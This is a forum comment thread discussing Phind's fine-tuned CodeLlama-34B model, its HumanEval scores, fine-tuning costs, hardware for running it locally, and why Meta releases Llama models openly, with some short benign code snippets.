The reason for that is that the push will always be in one direction in terms of size and improvement. That isn't going to stop. It will continue to push the edge of resources.

It's not Nvidia that's holding back the premise. AMD and Intel also can't do anything for you beyond what Nvidia can.

One might proclaim: yeah but in five years you'll be able to train CodeLlama 34B on a modest commodity desktop. Nobody will want to do that at that point, they'll want access to CodeLlama 204B.

The money will be in hosting these as a service business, and building further ecosystems around that. Not much different than the way a lot of major open source oriented companies have made their money, despite their core product being largely free to use.


I think you're correct in the "right now", but I think things fall off dramatically in the next 5-10 years. NVIDIA's progress from 2018 to 2023 was insanely impressive. AMD's was too in fact, at least technologically. Intel is third, but at least still in the game.

Where your premise here falls apart, is the age-old adage, "Don't let perfect be the enemy of the good."

We probably don't need CodeLlama 204B to be highly effective in our jobs as developers. Just like physicians probably don't need DocLlama 566B to be more effective in their jobs. We only need good enough. Good enough to be useful and insightful; not the All-Seeing Oracle that has insight beyond mortal man.

I think that revolution is probably coming sooner than we think. I'd argue that in 5-10 years, we'll have hardware powerful enough that a motivated and moderately well-heeled consumer can train their own LLM with domain-specific knowledge and have a product as useful as Llama8 1.3T or ChatGPT-14. There'll always be a market - I think anyway - for incredibly powerful general-purpose LLMs that are subscription-based (whatever that looks like in terms of cost / month), but locally trained, locally run LLMs designed to do one thing and do it well? I think that's the real money and the real future.


Well said. Companies will want:

* Pricing stability -- your business costs cannot be at the whim/survival of some particular company. Competition (including local options) is the solution.

* Model stability –– model output must be reproducible. If it's shifting unreliably, that's a showstopper.

* Alignment –– The model I use must be aligned to my business, not to Some AI Business. I don't want a model that was kneecapped in some secret, arbitrary way that a group of largely white, male, West Coast techbros decided was crucial for my business.

* Privacy –– Sensitive company data NEVER leaves the building. It sure as hell doesn't get expedited to a company with strong incentives to hoover up and use that data.

There will soon be 3 big competitors racing each other in the GPU space. Specialized AI hardware will grow in volume and power. Algorithms will be optimized. Perhaps new algorithms will appear for distributed training of open source models by millions of consumers cards (reminiscent of the Folding@home project). Hardware 5 years from now will blow away current tech.

Intelligence is a widely applicable asset with strong incentives to pop up everywhere. It won't sit gated behind a handful of companies. That's true regardless of substrate -- proteins or silicon.


I agree with your assessment on GPU sustainability.

Simply put, AMD is going to have to get their shit together. NVIDIA was embraced by the AI community so long ago because CUDA isn't that tough to use. I haven't looked at AMD's solutions at all - in fact I don't even know what they call their version of CUDA - but I know one thing for certain is that the world cannot depend on a single company to supply the underlying technology for this technological revolution.

That's an easy way to a dystopian hellscape.

And the only reason we haven't seen open source foundational model training is, because as you said, the only significant player in the arena right now is NVIDIA.

Here's hoping Lisa Su is shifting priorities - and quickly.


You still need the data.

And eventually might mean 10 years.

4k took ages until it just worked. I even switched to the M1 for this


4k as in screen resolution? That was a thing for many many years before M1.


Of course, but I still had a laggy UI and issues when sharing my screen, etc.

For example, the GCP (Google Cloud UI) became unusable while sharing in MS Teams.

Also, good/fast 4k displays still had a fan built in.


It beat it on a specific subset of languages


That's still interesting, as finetunes for different languages can be made using similar methodologies.


I think it just highlights the utility of finetuning.

This is something big tech can still offer with proprietary models.


Are you planning to switch to programming-language optimized model inside Phind? So, if a user is asking for something related to Python, that the python-optimized model gets used?

If so:

The Object Pascal language is completely out of fashion, and the most non-hyped language there is. However, there are hundreds of thousands of active users of Delphi, FreePascal and Lazarus. And due to the language being stable for over 20 years, there also is a gigantic amount of highest-quality code available. As most of it is neither on Github nor StackOverflow, Pascal code is dramatically underrepresented in GPT3.5, GPT-4 - and therefore also in Phind.

I'd like to finally be able to use AI-assisted programming with Pascal.

In case you are interested in that, I would be willing to internally pay for the work to prepare a good dataset of high quality code with comments/context/prompts.

If you are not interested, is there any chance that you are going to release the code and toolchain used to fine-tune CodeLlama, so I could do it myself?


Yes, this is the direction we're heading towards! We're building a mixture of experts of different coding models that we will deploy for precisely this use case.


Nice!

I suppose that Pascal is not on your planned list of supported languages, right?


Why would it? Do you know how much it costs to finetune one of these models for such a niche language? I'm not just talking about the cost of training, but also the cost of acquiring data because there's much less data about niche languages.


96 x A100 hours for a finetune according to the article.

The cost of the dataset curation for a given language is hard to quantify as there are many unknowns. However, it seems perfectly crowdsourcable to volunteers.


A project like SETI@home should help these efforts I believe?


Maybe the stable horde could work it into the project.

https://stablehorde.net/


It certainly costs much less to the society to train for Pascal once than to make everyone burn CPU cycles running Python!


> Do you know how much it costs to finetune

Between $30 and $3,000, often in the $300 range.


From their numbers, 3 hours with 32 A100 80GBs.

From Lambda Cloud:

3 hours * 4 nodes * ~$22/hr per 8x A100 ~= $265

So yeah not too expensive even for a native fine tune (obviously this ignores all other costs other than the GPUs)


It's wild to me that the raw compute cost is so low.


Sweet Jesus, that is amazing.


Where are the troves of Pascal code? Also manuals, books, etc. The quality doesn't have to be great. You can label and generate more data once you have enough to bootstrap the model.


> I would be willing to internally pay for the work

What kind of budget do you think this will require?


Not much, I guess. It's basically writing some scripts that will take the code base of some of the available high quality pascal projects, and then depending on what is available extract/merge documentation available as PDF, PasDoc, RTF, .HLP or method/function source code comments.

I would assume that one of my devs could write the needed scripts in three weeks or so.

So, basically a budget of <$5000.

For me - due to missing competence - the actual challenge would be to get a sample of what the training data should optimally look like (for example the Python training set), and someone to do the actual training. For a newbie, getting up to the required level of competence will surely take more than three weeks.
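
For what it's worth, a toy sketch of the kind of extraction script being described: it just collects .pas sources into a JSONL file that could later be cleaned and merged with external documentation (the project path and output format are made up for illustration):

    import json
    from pathlib import Path

    # Walk a Pascal codebase and emit one JSONL record per source file,
    # pairing each file's text with its path. Merging PDF/PasDoc/RTF/.HLP
    # documentation would be handled by separate, format-specific steps.
    root = Path("some-pascal-project")  # hypothetical project checkout
    with open("pascal_dataset.jsonl", "w", encoding="utf-8") as out:
        for path in root.rglob("*.pas"):
            text = path.read_text(encoding="utf-8", errors="ignore")
            record = {"source": str(path), "text": text}
            out.write(json.dumps(record, ensure_ascii=False) + "\n")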


Wow, we're blown away by this response! We love helping the open source community however we can.

This model is only the beginning -- it's an early experiment and we'll have improvements next week.


I've used GPT-4 for pretty much all of my programming needs, and the convenience of a 20 dollar subscription taking care of everything and letting me use an LLM without having to set up any models or servers has been just so simple. Is the 2 percent gain worth looking into running a local model again? I tried running a local model a couple months ago but the performance was bad. I know Code Llama came out very recently, but does anyone have any thoughts on its performance on programming tasks compared to GPT-4?


If all you care about is convenience, then anything cloud or SaaS will be better for you.


For me the use case is asking a local LLM questions about an invention I'm working on, as with ChatGPT I can't be confident the ideas don't make their way into the model. I'm able to run some 13B 5Q models, in my opinion the utility and complexity is somewhere between GPT3 and GPT3.5, which doesn't quite cut it for this purpose. That's not to say anything of the lacking coding abilities. I'm on the fence of getting a 3090. If I do so I think I'll set up a server on the PC so I can query the LLM from my phone just like one can use ChatGPT.


Personally I doubt that GPT-4 is really still at 67%.

I would love to see some head-to-head examples.

Is anyone hosting this somewhere that can be accessed for free right now?


I think for them it's about de-risking their business.


Glad to see open source models becoming competitive, and thanks for sharing the model with the community! Lepton AI has hosted this model free for everyone to give it a try (and compare to the original CodeLlama 34B version): https://codellama.lepton.run

The API is also available at https://codellama.lepton.run/api/v1 (it's fully compatible with OpenAI's API, so just switch the `api_base` to this URL and all your existing OpenAI client-side code should continue working).
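
Roughly like this with the (pre-1.0) openai Python client; the model identifier is hypothetical and whether the endpoint requires a real API key is an assumption:

    import openai

    openai.api_base = "https://codellama.lepton.run/api/v1"  # endpoint from the comment above
    openai.api_key = "sk-placeholder"                        # assumption: may not be checked

    resp = openai.ChatCompletion.create(
        model="phind-codellama-34b",  # hypothetical model identifier; check the endpoint's docs
        messages=[{"role": "user", "content": "Write a Python function to check for palindromes."}],
        max_tokens=256,
        temperature=0.1,
    )
    print(resp["choices"][0]["message"]["content"])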


I see you're using [INST] tokens. Please don't do this -- this model was not trained in this format or to be a chat model.

Instead, it should be treated as a completions model (like text-davinci-003) and no system prompt should be provided.

Just tell it what you want.


Thanks for pointing that out. We have now updated the prompt template to follow the format.


Hey, just an FYI, phind-codellama-34b-v2 was just released, which performs even better! Just letting you know in case you wanted to add the new model to the lepton chat you guys set up.


Hey, just an FYI, phind-codellama-34b-v2 was just released, which performs even better! Just letting you know in case you wanted to add the new model too!


Why is FB doing this? I am so perplexed. Like, I am still waiting for the "gotcha!". Purely to mess with MS?


It degrades Google's and OpenAI's ability to monetize.

That alone is worth gold, because tech is not a blue ocean anymore, neither from a market opportunity nor from an investor perspective. Your enemy's loss is your benefit. They can't use money they don't make to mount attacks to dislodge customers, investors, and mindshare from you.

Secondly, it commoditizes AI. Zuck believes that his platforms ultimately will benefit if there is more content, because his platforms sell the ability to show YOUR content over the rest, for coin. Just as with news/mobile games, driving the value of your content lower and lower by fostering the creation/supply of more of it is good for FB and bad for you. You have to advertise to rise above the noise. (And no, it doesn't really "affect users", because they see the same amount of content (attention is finite); it's entirely FB's discretion across all their surfaces what you see.)

Disclosure: Ex FB but not specific insights into current developments.


A previous post here on HN [1] discussed the leak of the original LLaMA model and Stable Diffusion. The article points out that the open-source community's effort resulted in more innovation, and an ecosystem built up around these models leading to rapid adoption. That gives more control to the original authors of the model against their competitors. I think Meta has recognized this and wants to keep their lead going.

[1] https://news.ycombinator.com/item?id=35813322


They’re also already giving out millions of dollars in man hours in releasing and maintaining open source software, as well as lots of other much less used ML models. So they have an existing open source strategy and it makes sense to double down on this one since it’s clearly more impactful than a lot of the other ones


They’re end-users of AI, they’re not vendors selling AI. Giving it away for free is not a loss to them.


One possible explanation is to make PyTorch victory over TensorFlow/JAX even more apparent: with Google ceasing to release interesting open-source models, and Facebook / Meta continuing doing so (even if under a less permissive license than usual), it means that there's nothing interesting in the TensorFlow/JAX ecosystem, and a lot in the PyTorch one.

(context: I work for Google DeepMind, opinions are my own)


Another possible reason might be to attract and retain talent? Speculating wildly but I'd guess some top researchers would value having their work be the industry standard rather than internal.


Your speculation is pretty accurate afaik. Mark commented that releasing open source models is what is needed to retain the best, so it is what they will do (paraphrasing), in his interview with Lex Fridman.


Hmm, but I feel like Jax/Pytorch interop is only getting better. Tensorflow abstraction has already firmly lost.


> Hmm, but I feel like Jax/Pytorch interop is only getting better

There's definitely some convergence. It's good. It still stands for a fact that most people do/think about PyTorch nowadays, not JAX (speaking as someone who likes JAX).


Phind did the fine-tuning, not Facebook.

This is actually an excellent demonstration of a good reason to open source something. Another company immediately made a dramatic improvement.

Now anyone from Facebook or any companies they have invested in can benefit from that improvement and information about how they did it. Facebook could even take this exact model and add a coding assistant into Messenger if they wanted (not that they are interested in that). Or apply it to other things.

OpenAI has a big lead. The most effective counter to that is actually to team up.


I think a smart company plans for what it sees the future holding, as opposed to optimizing for short-term gains. And text generation programs seem to be following nearly the exact same path as image generation programs did after DALL-E.

So in the future we're probably not going to see any single centralized player, but rather a wide decentralization with many options. It seems in this future, providing a 'decentralization ready' to go package that people can use and deploy for all sorts of things is far smarter than blowing through billions of dollars (and goodwill) desperately trying to become a centralized behemoth when you have no moat, no network effect, and perhaps a temporary technical advantage at best.

And while OpenAI has blown through a bunch of good will going from Open-ForSociety-AI to Closed-ForProfit-AI, Facebook has simultaneously gained a bunch of good will. What this translates to is really difficult to even imagine, but it's certainly desirable. And really I think this intangible of good will is something many modern corporations don't give enough value to, and it's hurting them - catching more flies with honey than vinegar, and all that.


> Purely to mess with MS?

Unlikely, as Microsoft is the preferred partner for Llama 2 [1]. It's not clear what Meta's end goal is, but large companies can loss-lead investments to grab mind share and worry about business models later, an approach which seems to be working well [2]: Meta went from not being in the leading-AI-companies conversation to being the company behind the models that most OSS innovation is happening around.

At the very least they've already created a strong brand around Llama, with eyes watching their every release - invaluable reach that other companies could only dream of, making it easy to promote and gain instant traction for new Llama-based products (like this).

[1] https://about.fb.com/news/2023/07/llama-2/

[2] https://news.ycombinator.com/item?id=35813322


My little theory is Microsoft actually learned a lesson from their experience going up against LAMP in the 90s. They got positively wrecked with their "Proprietary, $, closed-source Windows, IIS, ActiveX or whatever" approach.

They release a ton of AI stuff themselves and partner on things like this. They're also big backers/investors in OpenAI and have their own proprietary products, of course.

I think they're taking that lesson and hedging their bets this time. It's like how a lot of corporations will donate to both political candidates (in the US) to guarantee they'll have access/influence regardless of how things shake out.


Facebook has had an AI research lab for the better part of a decade now. Their open-release model worked well in the past and it seems to be working well with Llama too. That looks like the extent of it.

We should expect more FAANG-sized companies to do this, frankly. It's surprising to see people anticipate a 'gotcha' considering how influential and transparent PyTorch was.


Given that LLMs might be a generation-defining technology it's certainly weird that one of the biggest public companies is giving theirs away for free.


They're actually not giving it away for free. At least not Llama 2. Once a product successfully monetizes and gains over a certain number of users, an official license from Meta has to be negotiated, otherwise Meta could revoke usage of the model. At least that's roughly what the Llama 2 license implies.


That's not quite right. The license never gets revoked. Once over a certain size, the company will not receive licenses to new versions/releases.


This is how I understand it too, and it's very interesting. In any case, if your company reaches that size, I'm sure you'll have replaced it with something else by that time. I'm confident many fully open-source, high-quality and specialized models will be available in the next years - even thanks to Meta. Whatever their strategy is, the models are on our machines, legally, and this is incredible.


But that clause pretty much only applies to mega companies like FB no?


Does FB care about any companies smaller than that? If they're Instagram-competitive-successful, FB can afford to buy them.


Yeah, IIRC it's something like 700M users, i.e. Meta gets to piggyback off any generational winners.


The open research tradition has held for many defining technologies; most companies continued releasing for free even when it became clear this tech would be transformative (I think it was obvious by GPT-2).


Web browsers were also a generation-defining technology.


This would be more like Google giving away their search algorithm in 2000.


That would be it if it was OpenAI releasing GPT4. Facebook releasing Llama is like Google releasing Chrome.


If Facebook were to implement a language model inside the platform now, it would raise a lot of privacy issues. By publishing free-to-use models they can rely on others to do the work of training society to use such tools at mass scale. So by the time they adopt it in all their services there will be much less backlash.


Also, it's cheaper.

Not just for the engineer-hours, but for the endless VP/PM political meetings arguing over this approach or that.

Way cheaper to let the market decide, and then reincorporate the winner into their products. A winner which happens to already be based on a semi-compatible tech stack.


They're in the business of encouraging users to post content to get more eyeballs and therefore more ad revenue. So commoditising a way of generating a lot more content is in their interests.


This. I recall in their earnings report they gave a similar answer, i.e. the more this technology is made accessible, the better the content put on social media becomes. They also pointed out that any improvements made can be incorporated into their stack, like what happened with Open Compute and PyTorch.


Why wouldn't they? It is their best strategy.

I didn't like them that much before, now I do.


> perplexed

Apt choice of word


This stuff is accelerating at an alarming pace. I know of three or four off-the-shelf solutions to self-host and run models now. I have learned so much and continue to learn about how this stuff works.


I don't think it's alarming, I think it's cool. It's just autocomplete :)


Any recommendations for learning material?


The localllama subreddit has lots of content, though mostly unstructured.


TheBloke discord


What is alarming about it?


Congrats!

I've played with Phind a few times, and it's definitely one of the cooler products to come out of the LLM boom.


Great stuff - and training was so cheap too - it would have cost less than $200 on Runpod, and half that price on spot instances.

I guess it's time languages other than Python, especially niche ones, started collating their own language specific datasets.

Personally, I daydream about an Elixir specific LLM I could run locally, trained or fine tuned to respond in an idiomatic fashion, and plug into a tool like Cursor.so.

Are there any examples from the internal dataset of ~80K instruction/answer pairs that Phind used to tune this?


Glad this work is happening! That said, HumanEval as the current gold standard for benchmarking models is a crime. The dataset itself is tiny (around 150 examples) and the problems aren't really indicative of actual software engineering problems. Also, we've been able to get around 85% pass@1 on GPT-4 internally as of a couple weeks ago. It's hard to say if they've contaminated the models with RLHF though. It still is exciting how close we're getting with open source models, but we've still got a decent amount of work to go!
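For anyone unfamiliar, pass@1 here refers to the metric from the Codex paper. A quick sketch of the standard unbiased pass@k estimator (n samples generated per problem, c of which pass the tests):

    import numpy as np

    def pass_at_k(n: int, c: int, k: int) -> float:
        # Unbiased estimate of the probability that at least one of k
        # samples, drawn from the n generated ones, passes the tests.
        if n - c < k:
            return 1.0
        return 1.0 - np.prod(1.0 - k / np.arange(n - c + 1, n + 1))

    print(pass_at_k(n=10, c=7, k=1))  # 0.7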


Yes -- we're being careful with our claims here. This model is not yet necessarily a better coding model overall, but it's strong on Python.

We're working hard to use these advances to make models that are production ready. One such idea is to run a mixture of experts on various fine-tuned CodeLlamas.


I think the issue of test set contamination is important, but it’s academic - when a model contains a good enough distilled representation of arguably all the code out there, does it really matter whether it can generalise OOD?

Realistically, how many of the practical use cases where it'll be applied will be OOD? If you can take GPT-4 there, then you are either a genius or working on something extremely novel, so why use GPT-4 in the first place?

I understand the goal is for LLMs to get there, but the majority of practical applications just don’t need that.


> when a model contains a good enough distilled representation of arguably all the code out there, does it really matter whether it can generalise OOD?

If its contaminated by the test set being in the model’s training set, then the test is no longer (assuming it was in the first place) a valid measure of whether the model has “a good enough distilled representation of arguably all the code out there”.


One thing I'd be curious to see is how well this translates to things outside of HumanEval! How does it compare to using ChatGPT, for example?


What would be the absolute top-notch Nvidia card I should buy now, that would last long and would run most (if not all) of the bigger-end SotA models like CodeLlama or Stable Diffusion XL blazingly fast?

Also, should I buy multiple and bundle them, in case a single top card won't satisfy the above requirements?


It depends how much you're willing to spend.

You can get an H100 (80GB) for around $28-30k, an A100 (40GB) for around $6-7k, and a 4090 (24GB) for $1.5-2k.

You can build a normal pc with a 4090, otherwise you're in datacenter territory.

You can bundle up more GPUs.

You can decrease the precision of your models to get them to run on cards with less RAM.


Could I really buy a single A100 as a consumer? Any links for that?

And could I fit models bigger than 40GB into an A100?


You can snag them on Ebay[0], the A100 with 40GB is ~$5000, the 80GB is like $13,000, good luck, hope it doesn’t break, since you’re not getting a warranty!

[0] https://www.ebay.com/sch/i.html?_nkw=a100+40gb


I'm seeing a bunch of results from China. I was under the impression it was illegal to sell A100s to China, so where are the Chinese sellers getting these cards?


As a consumer, isn't the A100 costing you an unnecessary "cloud tax"?


A 4060 Ti with 16GB of memory costs around $700-800 over here. Can I connect two of these to get 32GB of memory to run the bigger models (13B stock or 30B quantized)?


One additional caveat worth considering... a lot of LLM computation is often memory bandwidth bound. The 4060 Ti is infamous for how deeply Nvidia cut the memory system. The 3060 Ti had a 256-bit bus that was capable of 448GB/s of memory bandwidth. The 4060 Ti has a paltry 128-bit bus that can only do 288GB/s, about 64% of the memory bandwidth of the previous generation.

For comparison, an RTX 3090 has 935GB/s of memory bandwidth. As the other person mentioned, that would likely be a much better card if you can find a used one for a reasonable price... but that's just my opinion.
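Back-of-the-envelope sketch, assuming single-stream generation has to read the full set of weights from VRAM for every generated token (a simplification, but roughly how it works out in practice):

    def tokens_per_sec_ceiling(bandwidth_gb_s: float, weights_gb: float) -> float:
        # Upper bound: each token requires streaming all weights once,
        # so throughput is capped at memory bandwidth / model size.
        return bandwidth_gb_s / weights_gb

    weights = 20  # ~34B params at 4-bit is roughly 20GB
    print(tokens_per_sec_ceiling(288, weights))  # 4060 Ti: ~14 tok/s ceiling
    print(tokens_per_sec_ceiling(935, weights))  # RTX 3090: ~47 tok/s ceiling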


Thanks for the info!


A 3090 with 24GB of vram is $650 used on Facebook where I live. I think that would be a better card as you can use nvlink.

Alternatively, the 4000 series cards rely on the PCI express lanes for linking, so if you want to get the benefits of linking the 4000 series cards as a consumer you’ll want a Threadripper or even maybe an EPYC CPU/motherboard combo.


Have a play on vast.ai first. I don’t know about these models but for training smaller models the humble 3090 packs a punch.


What kind of hardware does it take to fine tune such a model? I've been day dreaming about self-play with these models. Generate 100 leetcode problems. One variant writes test cases, one variant writes code. Make the loss for the tester high if there are bugs (maybe compare to using a fuzzer on the program or have multiple tester variants generating large test suites). The coder variant has loss related to number of failed test cases or retries or something.

Then, just keep running that in a loop, generating, testing, developing.

Is it possible to self-train like this, or attempt to do so, on commodity hardware? Could I make a meaningful change to 34B sized models if I had one or two 4090s? (Or something for a similar, few thousand dollar, price point).
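A minimal sketch of the loop I'm imagining, where generate() is just a stand-in for whatever local inference stack you'd wire up (llama.cpp, transformers, etc.), not a real training harness:

    import subprocess, tempfile

    def generate(prompt: str) -> str:
        # Stand-in for a call to the local 34B model.
        raise NotImplementedError

    def passes(solution: str, tests: str) -> bool:
        # Run the tester variant's asserts against the coder variant's code.
        with tempfile.NamedTemporaryFile("w", suffix=".py", delete=False) as f:
            f.write(solution + "\n\n" + tests)
        return subprocess.run(["python", f.name], timeout=30).returncode == 0

    problem = generate("Invent a LeetCode-style problem statement.")
    tests = generate("Write assert-based tests for this problem:\n" + problem)
    solution = generate("Write a Python solution for this problem:\n" + problem)
    reward = 1.0 if passes(solution, tests) else 0.0
    # reward would then drive the fine-tuning step (RL, rejection sampling, ...)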


The AI race to zero is accelerating, and Meta has already won it. They are fuelling an ecosystem of downloadable AI models released for $0 that anyone can use, unlike the gate-kept, cloud-only models from OpenAI, Anthropic and Google; the free models will catch up to GPT-4 sooner than people expect.

Cloud-only models cannot compete with free, and those companies continue to lose hundreds of thousands of dollars a day, especially OpenAI, which is getting disrupted by the $0 free AI model ecosystem thanks to Meta.

It is clear that the REAL 'Open AI' has always been Meta. Funny how many here dismissed Meta a year ago; since the days of the ConvNet hype they have been releasing their AI research more frequently than OpenAI updates its GPT models.

For Meta, they are already at the finish line, and thanks to them you have CodeLlama, accelerating and driving inflated developer salaries to the bottom. No need for expensive, tired seniors and inexperienced juniors when two engineers with CodeLlama can do the same work faster for less.

The future is hiring fewer developers, but utilising AI, not hiring more at extremely inflated salaries.


Increased output leads to increased demand. If last week I could pump out 3 solid PRs that fixed issues in our product, then it will be expected that I pump out 20 PRs using AI in a week. Information Engineers are going to be in more demand than ever; the title is just going to change to Platform Engineer because that's the level we'll be expected to operate at with the new tooling. This is why there's a multitude of LLM frontends being released every week - that is no longer skilled labor, and an elementary school child with enough time can do it. But building an entire platform that can scale and has five 9's of uptime?

When an AI can do that, then we panic.


So, about 2 weeks?


> The future is hiring fewer developers, but utilising AI, not hiring more at extremely inflated salaries.

How about: the future is hiring less of everyone?


Coding is exhausting, and if a computer can do it I'm fine with that. Coding, I think (or what got me into it), is about getting amazing machines to work, not building bloatware for a paycheck. If AI can do the boring fine details and we get to spend more of our time on ideas or something like that, I'm all for it. Let's figure out new jobs to do instead :)


Assuming more compute is better, free models will always be a step behind in speed/quality and a step ahead in privacy.


Yes, on our local machines. But on specialized remote computers, I guess it will be fast, accurate, and cheaper.


Yes, on remote cloud computers it will be fast, but then you are just changing who you decide to trust.


As if the engineers were causing income inequality.


Sounded like some copium blended with sarcasm to be honest.


Sounds like schadenfreude.


Perhaps it is because it is true and both of you are showing signs of great denial.

Engineers will be replaced by those that use AI; it will only accelerate, and fewer of them will be hired.


> Engineers will be replaced by those that use AI

So 10x engineers will replace normal engineers? Although this seems plausible, the advent of the 10 or 100x engineer isn't something new (and it didn't put millions of engineers out of work, although it created the biggest corporations to ever exist).


> Engineers will be replaced by those that use AI

By that time, not only engineers will get replaced. What do you do, if I may ask?


There is only one thing that you can do and it is just to accelerate it.


No, I meant what do you do for a living.


Meta isn't being "heroic" or "winning a long fought battle" or whatever analogy you want to use in order to prop them up and make them look better than they are.

Do I appreciate the free weights from them? Yes. Did they contribute to a genocide in Myanmar? Also yes.

Take the weights and move on. They don't deserve the excessive praise. They aren't a rock band. They are an advertising company.


> Meta isn't being "heroic" or "winning a long fought battle" or whatever analogy you want to use in order to prop them up and make them look better than they are.

The AI race is real and the AI research Meta has done deserves praise, as well as their engineering contributions.

> Do I appreciate the free weights from them? Yes. Did they contribute to a genocide in Myanmar? Also yes.

So does that mean we shouldn't use their technologies? If you are looking for big tech companies that have no skeletons that are also significantly progressing the field of AI, then you're going to be very disappointed.

> Take the weights and move on. They don't deserve the excessive praise. They aren't a rock band. They are an advertising company.

Perhaps it is you that needs to move on, unless you will actually do something about it?


I don't know why you so-called experts and self-proclaimed intelligent people never share the complete steps and requirements to test and debug any code for newcomers. Do you really feel that newcomers and less knowledgeable people can never give good input? I myself struggled to install the oobabooga web UI; I downloaded two models, one from the main branch which hung the PC, and a second (4bit-32g-actorder) which failed with 'AsyncRequest' object has no attribute '_json_response_data'. Now I am clueless and disappointed by the inhuman behavior of you people.


How do you use this or GPT-4 for day-to-day code? I want to feed my code repo into it and generate/fix/explain code. Is the context window size going to block me? Has anyone been doing this with Llama 2 models?


https://cursor.sh is the best I've seen so far. It uses GPT-4. I'm sure someone will hook it up to code llama soon.


Thanks. Is there any open source hosted solution like Cursor that can use the Llama models?


I made some notes recently on the various code helpers/editors available, both SaaS/services-based and ones that are more BYOB: https://llm-tracker.info/books/llms/page/code-assistants


Does this page have a bunch of blue-text runs that aren't links?


Yes. I think it's just a highlight. The HTML doesn't look like it's trying to be a link or anything.


it's not supposed to be a link, but I see how it'd be confusing. will fix


Quite promising, and at last it looks like we have pretty decent models that can run locally. It is not perfect; they still fail on the first go to provide a correct answer to stuff like "How do I read a CSV file in Julia". I wish there was more fine-tuning towards languages less popular than Python/JavaScript. These models seem like they could be a great tool to help learn new languages. We are not there yet, but hopefully we will be soon.


This is impressive, so congratulations. I also think that this is a great example of how open source can simply lead to faster and better acceleration.


Their pricing page says 30 uses per day of GPT-4. What exactly does that mean - they send my query to OpenAI's GPT-4 and return the result?


Their model takes your query, then issues a web search, evaluates the results, considers follow-up questions, and compiles a prompt with the right context that is sent to GPT-4; you then see the output of that.
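Roughly this shape, as I understand it from the outside (every helper below is a placeholder to illustrate the flow, not Phind's actual internals):

    def web_search(query):           return ["<result snippets>"]
    def followup_questions(q, res):  return ["<clarifying sub-questions>"]
    def call_gpt4(prompt):           return "<answer>"

    def answer(query):
        results = web_search(query)
        subqs = followup_questions(query, results)
        prompt = ("Context:\n" + "\n".join(results) +
                  "\nSub-questions:\n" + "\n".join(subqs) +
                  "\nQuestion: " + query)
        return call_gpt4(prompt)

    print(answer("How do I reverse a linked list in C?"))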


Nice result! I've been looking into benchmarking models recently; it would be interesting to run your model through the same battery of tests [https://github.com/emrgnt-cmplxty/zero-shot-replication/blob...]


It's amazing to see how rapidly things are moving.

You can try out CodeLlama-34B on Anyscale Endpoints (an LLM inference API we're building here at Anyscale for open source LLMs).

https://app.endpoints.anyscale.com/


This looks like it might be neat but it has a pretty sparse intro page and then the email signup goes straight into stripe checkout - is there any more info about the service anywhere? Like which models are available, or more pricing info?


Thanks for the feedback, we'll improve the landing page!

The models (and current prices) right now are:

- Llama-2-7B ($0.25 / million tokens)

- Llama-2-13B ($0.50 / million tokens)

- Llama-2-70B ($1 / million tokens)

- Code Llama ($1 / million tokens)


Awesome, thanks! I've been wanting exactly this service.


I had the same question. Being thrown into a payment page right after providing your email is very jarring. I don't want to pay for a product without even giving it a spin.


From the FAQ:

> What rights do you claim to my queries?

> During the alpha release, we may use your inputs and outputs to improve the service. In a future release, we may provide the ability to opt out of certain data uses.

I understand that you are in alpha, but paying without any privacy guarantees is a little hard to accept right now.

Otherwise your service seems really nice, I'm sure a lot of people have been waiting for something like this. Any ETA on the opt-out and further clarification on the matter?

Thank you.


So for huge log files, would the entire thing be fed in, with the offending lines of previous log files identified, in 4096-token chunks? Has anyone got a better workflow for training on the above scenario? These log files grow to multiple MBs within a few minutes from the Android kernel.
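Something like this is what I have in mind for the chunking side; whitespace splitting is a crude stand-in for a real tokenizer, and the file name is just an example:

    def chunk_log(text: str, max_tokens: int = 4096):
        # Crude approximation: treat whitespace-separated words as tokens;
        # the model's own tokenizer would count differently.
        words = text.split()
        for i in range(0, len(words), max_tokens):
            yield " ".join(words[i:i + max_tokens])

    with open("kernel.log") as f:  # hypothetical Android kernel log dump
        chunks = list(chunk_log(f.read()))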


For anyone who is using ollama to run these models, how do I give it prompts with newlines?


Totally out of my depth here, but is there any chance that this could be added to something like Ollama and run on a 32GB or 64GB M-series Mac in due course? I'm currently running base CodeLlama in this manner, but it's the 7B variant.


Looks like it's available: https://ollama.ai/library/phind-codellama/tags

(I don't have a Mac, so I can't say whether/how well it works.)


I tried out the 7B one last night and wasn't impressed. When asked to write in Python it can correctly write a regex to parse a date, but when you ask the same in TypeScript for Node.js it fails to do so.


Well, 7B ≪ 34B.


I built a chatbot that runs in the browser with WebAssembly and WebGPU. How does it run for you? https://chat.palapa.ai


That's good and all, but GPT-4 can do all languages, not just 2-3.


How hard is it to do fine-tuning? I thought it would be cool to tune one to be good at debating and changing people's minds about pickleball.


If you're creating an AI to dissuade people from pickleball then this is truly AI alignment promised land.

If, however, your AI is arguing in favor of it, then we have truly entered the age of renegade AI.


How come you no like?


Did you use the same pass@1 generation method as in the code llama paper (greedy decoding)? I couldn't find this in the blog post.


We used sampling with temperature=0.1. Reproduction details can be found on the Huggingface model card: https://huggingface.co/Phind/Phind-CodeLlama-34B-v1
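For anyone who wants to try it locally, a minimal generation sketch along these lines should work (the model card has the exact reproduction details):

    from transformers import AutoModelForCausalLM, AutoTokenizer

    model_id = "Phind/Phind-CodeLlama-34B-v1"
    tok = AutoTokenizer.from_pretrained(model_id)
    model = AutoModelForCausalLM.from_pretrained(model_id, device_map="auto")

    prompt = "Write a Python function that checks whether a number is prime.\n"
    inputs = tok(prompt, return_tensors="pt").to(model.device)
    out = model.generate(**inputs, do_sample=True, temperature=0.1,
                         max_new_tokens=256)
    print(tok.decode(out[0][inputs["input_ids"].shape[1]:],
                     skip_special_tokens=True))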


Got it, thanks - and thanks for the model! I'd be interested in the results if anyone benchmarks without sampling.

Edit: it could also be misleading to directly compare HumanEval pass@1 against CodeLlama without the same generation methodology (possibly against GPT-4 as well, but I don't know their methodology).


Does this mean Phind Pro might become cheaper?


This is wonderful news. Maybe next a fine tune based on OpenAI’s function API, which I consider their killer app.


At this point we should be praying that the next competing model be called Winamp to come full circle.


what hardware could one run this locally on? probably need 3090 etc right?

finally a reason to upgrade from my m1 max


34B is basically an exact fit for a 3090, when quantized to 4 bits.
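Rough napkin math (the overhead figure is just a guess for KV cache and buffers):

    params = 34e9
    weights_gb = params * 0.5 / 1e9   # 4-bit -> 0.5 bytes/param, ~17GB
    overhead_gb = 3                   # rough guess: KV cache, activations, buffers
    print(weights_gb + overhead_gb)   # ~20GB, which just squeezes into a 24GB 3090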


